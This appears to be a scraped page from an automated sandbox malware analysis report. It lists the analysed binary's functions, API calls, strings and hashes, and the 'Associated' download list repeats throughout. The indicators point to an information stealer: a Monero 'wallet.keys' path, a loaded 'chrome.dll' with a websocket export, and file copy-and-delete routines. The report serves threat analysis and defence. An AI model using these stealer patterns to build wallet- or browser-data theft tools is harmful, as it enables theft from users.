Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 353b43d4e615ee475fea39b9f3937d79b885ddd1ec11826e24d84261c3472388
Instruction ID: 7399293263cd75c94291912dbdbf7f35cc3297bf4b2203bc929973f7d5ce5e2e
Opcode Fuzzy Hash: 353b43d4e615ee475fea39b9f3937d79b885ddd1ec11826e24d84261c3472388
Instruction Fuzzy Hash: FF01DEB560420CFFCB04EFA8CD44EAE7BB8EB49344F148258F9099B245D731EA41EB90

Function 00CD12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CD12B4
RtlAllocateHeap.NTDLL(00000000), ref: 00CD12BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CD12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CD12F5
RegCloseKey.ADVAPI32(?), ref: 00CD12FF

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: e2bb1d1c58ded69db6eb41f5b95e79d5606208b65c1348ea8c3ad7105644e703
Instruction ID: 2587c81d79a97c6294a66f67b5e963a4ded8fbe2b3259ddfb3158e1e9cdf9b9f
Opcode Fuzzy Hash: e2bb1d1c58ded69db6eb41f5b95e79d5606208b65c1348ea8c3ad7105644e703
Instruction Fuzzy Hash: 7E01CDB9A4430DBFDB04DFD4DC49FAE77B8EB49701F104195FA1597280D6709A009B90

Function 00CECB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 00CECC1C
___crtLCMapStringA.LIBCMT ref: 00CECC3C
___crtLCMapStringA.LIBCMT ref: 00CECC61

Strings

, xrefs: 00CECBC6

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 471203aeb596efa482e5f03e70f39d780a32ee5c262476661483ddf8044b7aa7
Instruction ID: 707eec94f991202fd5db48ece41d446ca6d554aeb49b6c4c4261060fdc7ce42b
Opcode Fuzzy Hash: 471203aeb596efa482e5f03e70f39d780a32ee5c262476661483ddf8044b7aa7
Instruction Fuzzy Hash: E741E5B01007DC5FDB318B258DC5FFBBBE89B45704F2444E8E99A96182E2719B46DF60

Function 00CE68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00CE6903

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

ShellExecuteEx.SHELL32(0000003C), ref: 00CE69C6
ExitProcess.KERNEL32 ref: 00CE69F5

Strings

<, xrefs: 00CE6979

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 44a16b491e8535ebea2e517601dc89d9a977544a7aa938c3e94e273fd231ffdf
Instruction ID: 1809f368bc6463f501a2b21e7d62337b303bf3663d58cb8fea0c7bca3a10dcc8
Opcode Fuzzy Hash: 44a16b491e8535ebea2e517601dc89d9a977544a7aa938c3e94e273fd231ffdf
Instruction Fuzzy Hash: 583104B1901258AFDB14EBA1DC92FDEB778AF48300F404199F209A6191DF746B48DF69

Function 00CE8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CF0E10,00000000,?), ref: 00CE89BF
RtlAllocateHeap.NTDLL(00000000), ref: 00CE89C6
wsprintfA.USER32 ref: 00CE89E0

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Strings

%dx%d, xrefs: 00CE89D7

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 6210bd41fb16a2d7b2a2417cceb808b1a869691871453d75e0994f8bd1be592a
Instruction ID: fa82eb29c38ac465c06a337fef50bd464f1edee352149cea235b1b855962c231
Opcode Fuzzy Hash: 6210bd41fb16a2d7b2a2417cceb808b1a869691871453d75e0994f8bd1be592a
Instruction Fuzzy Hash: 482130B2A44348AFDB00DF94DD45FAEBBB8FB49710F104159F615A7280C77569009FA1

Function 00CDA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00CDA098

Strings

C:\ProgramData\chrome.dll, xrefs: 00CDA093
free_result, xrefs: 00CDA0C9
connect_to_websocket, xrefs: 00CDA0B3

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 1029625771-1545816527
Opcode ID: 3e9939b3ebc8503ee7f5190e29bd0f887245f5edb5fc94b89f8a5714d956583c
Instruction ID: 2fe728c9a2a88dcb689e47456077d882742db04dc78911a3e28aad2c705c9500
Opcode Fuzzy Hash: 3e9939b3ebc8503ee7f5190e29bd0f887245f5edb5fc94b89f8a5714d956583c
Instruction Fuzzy Hash: A6F030F176C30CEFD710BB66EC48F267294E746300F104425E606972A0D7755984EB67

Function 00CE8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00CE96AE,00000000), ref: 00CE8EEB
RtlAllocateHeap.NTDLL(00000000), ref: 00CE8EF2
wsprintfW.USER32 ref: 00CE8F08

Strings

%hs, xrefs: 00CE8EFF

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 4203d748ed8066ee19156984bb3620301332df4fdce2a27a3ccff569f2082b36
Instruction ID: 62348a8756ec5a31232ee0d241dd2d983a10d86ea8a8bb66b3276aaca71a56a2
Opcode Fuzzy Hash: 4203d748ed8066ee19156984bb3620301332df4fdce2a27a3ccff569f2082b36
Instruction Fuzzy Hash: 78E0ECB5A4830DBBDB10EB94DD0AE6D77B8EB46701F100194FE0997381DA719E10AB91

Function 00CDA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CDAA11
lstrlen.KERNEL32(00000000,00000000), ref: 00CDAB2F
lstrlen.KERNEL32(00000000), ref: 00CDADEC

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

DeleteFileA.KERNEL32(00000000), ref: 00CDAE73

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 02917355987ff22d35747e433c3364c78411cfa1c7987f14a4dbcd3918d63f44
Instruction ID: bca465f8ff04976339d37030a35ae225f0202b92cb89d4b1242e276b80e59bbd
Opcode Fuzzy Hash: 02917355987ff22d35747e433c3364c78411cfa1c7987f14a4dbcd3918d63f44
Instruction Fuzzy Hash: A2E1DB72D101489FCB14FBA5DDA2EEE7339AF24300F5185A9F516720A1EF307A48DB62

Function 00CDD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CDD581
lstrlen.KERNEL32(00000000), ref: 00CDD798
lstrlen.KERNEL32(00000000), ref: 00CDD7AC
DeleteFileA.KERNEL32(00000000), ref: 00CDD82B

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 19f3a387e17316fe8cb9ea5ec56f6460082c7e74eb90548014f68f7ee9b159d8
Instruction ID: c679b093b4ec10124e0f2c20ebbef59ee74996eda07b77b12bfb9b84e1aea10c
Opcode Fuzzy Hash: 19f3a387e17316fe8cb9ea5ec56f6460082c7e74eb90548014f68f7ee9b159d8
Instruction Fuzzy Hash: BA91EE72D101489FCB14FBA5DCA2EEE7339AF64300F5185A9F51766191EF307A08EB62

Function 00CDD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CDD901
lstrlen.KERNEL32(00000000), ref: 00CDDA9F
lstrlen.KERNEL32(00000000), ref: 00CDDAB3
DeleteFileA.KERNEL32(00000000), ref: 00CDDB32

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 32e67a9e11179156842add26615550c3d594236b5f9d1bf94b8a005c7cf1c429
Instruction ID: 0f9176bd1dea8acb24e15802ad07ca051e888702e9669b4c5c6fb8e449c378f8
Opcode Fuzzy Hash: 32e67a9e11179156842add26615550c3d594236b5f9d1bf94b8a005c7cf1c429
Instruction Fuzzy Hash: 2681EE72D101489FCB04FBA5DCA6EEE7339AF64300F518569F517661A1EF307A08EB62

Function 00D4FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D4FF9E
___AdjustPointer.LIBCMT ref: 00D4FFC1
___AdjustPointer.LIBCMT ref: 00D5005D

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
